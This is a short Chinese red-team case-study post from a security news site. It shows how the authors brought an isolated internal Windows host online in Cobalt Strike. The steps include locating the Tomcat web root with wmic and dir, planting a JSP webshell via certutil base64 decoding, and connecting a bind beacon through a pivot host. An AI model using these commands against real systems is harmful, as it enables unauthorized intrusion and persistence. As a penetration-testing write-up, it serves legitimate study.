一次不出网上线cs实战案例

阅读量225109

发布时间 : 2022-07-27 10:00:06

 

场景

shiro打点获取10段服务器权限,在10段机器出网且已上线cs;172段不出网且反向不通10段,已通过mysql弱口令获取system权限,存在web服务。

 

上线过程

思路:写入webshell,通过正向马上线cs。

getshell

通过web服务获取一个web目录下的文件名:stf-login-bg.jpg

获取所有盘符

wmic logicaldisk get caption,name

通过文件名获取web目录

dir /a /s /b d:\"stf-login-bg.jpg"

根据图片URL确定D:\apache-tomcat-7.0.73-windows-x64\apache-tomcat-7.0.73\webapps\ROOT\static\images\login\stf-login-bg.jpg为真实web路径,使用\可dir到此路径。

echo配合certutil写入webshell:

//base64编码shell.jsp
certutil -encode shell.jsp jsp.txt 

//echo编码后的内容到web目录
echo xxxx >D:\\apache-tomcat-7.0.73-windows-x64\\apache-tomcat-7.0.73\\webapps\\ROOT\\static\\images\\login\\12.txt

//解码还原文件
certutil -decode D:\\apache-tomcat-7.0.73-windows-x64\\apache-tomcat-7.0.73\\webapps\\ROOT\\static\\images\\login\\12.txt D:\\apache-tomcat-7.0.73-windows-x64\\apache-tomcat-7.0.73\\webapps\\ROOT\\static\\images\\login\\123.jsp

上线cs

新建监听器

生成正向马

通过webshell上传到目标机器并执行,使用跳板机连接,上线cs。

connect 172.20.57.122 28888

本文由Tide安全团队原创发布

转载,请参考转载声明,注明出处: https://www.anquanke.com/post/id/276882

安全客 - 有思想的安全新媒体

分享到:微信
+10赞
收藏
Tide安全团队
分享到:微信

发表评论

Tide安全团队

Tide安全团队正式成立于2019年1月,是新潮信息旗下以互联网攻防技术研究为目标的安全团队,目前聚集了十多位专业的安全攻防技术研究人员,专注于网络攻防、Web安全、移动终端、安全开发、IoT/物联网/工控安全等方向。

  • 文章
  • 83
  • 粉丝
  • 71

热门推荐

内容需知
合作单位
  • 安全客
  • 安全客
Copyright © 北京奇虎科技有限公司 三六零数字安全科技集团有限公司 安全客 All Rights Reserved 京ICP备08010314号-66